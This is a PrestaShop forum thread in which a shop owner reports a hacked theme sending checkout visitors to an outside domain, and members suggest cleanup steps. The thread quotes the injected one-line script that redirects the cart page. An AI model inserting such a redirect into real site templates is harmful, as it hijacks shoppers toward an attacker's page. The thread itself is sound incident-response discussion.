Malicious code

[p4presta]

Hi All,

 

Our customers were being redirected from the cart / orders page to the following address  http://cwcargo.com/Checkout

 

On doing a search on the files, we found the below malicious code within the shopping-cart.tpl  

<script>document.location="http://cwcargo.com/Checkout"</script>

 

Apart from deleting this code and changing FTP passwords - what can we do to prevent this

 

We are using PrestaShop version: 1.6.0.8   and third party theme 

 

 

Thanks in advance 

 

 

[endriu107]

What is theme name?

[musicmaster]

If you look around the forum you will see that there are a lot of issues about hacked sites at the moment and that the main reason is some theme that has been hacked.

 

So it is important that you answer the question of Endriu. 

 

If indeed you have one of the hacked themes than you would need to do a much more radical cleanup as you are doing now.

[p4presta]

Thanks for your replies 

 

The theme is called  Autumn

[vekia]

did you find the malicious code? how it looks like? can you share it here?

[p4presta]

Vekia see below

 

<script>document.location="http://cwcargo.com/Checkout"</script>

 

I've cleaned it once but back again

[PrestaHeroes USA]

Follow this path it may help

 

first change all ftp passwords, 

make sure you have up to date virus protection on your local computer

 

using ftp downlaod to your computer shop files (here we expect to catch the virus/trojan).  Key is to get current anti-virus to scan your shop files on your computer...typically the infect/inject a .js file...these then modify other files you  might have already fixed but come back.

 

(to replace files of native ps)...download your version from PS and unzip it for later reference

 

(to replace files of theme) get original source of your downlaoded theme.

 

Also, using ftp or hosting control panel (files), sort files by date looking for files that have been updated recently...

 

note : folder 755  files 644 (is typical permissions)

 

Then hopefully with other tips you can resolve, then consider this module (by me).

https://www.prestashop.com/forums/topic/303132-module-prestavault-malware-trojan-virus-protection/

 

also see this from themeforest comments section,  search 'hacked'

https://themeforest.net/item/autumn-responsive-prestashop-16-theme-with-blog/3848244/comments?utf8=%E2%9C%93&term=hacked&from_buyers_and_authors_only=0

Edited July 10, 2016 by El Patron (see edit history)

[p4presta]

Thank you El Patron - shall definitely look into your module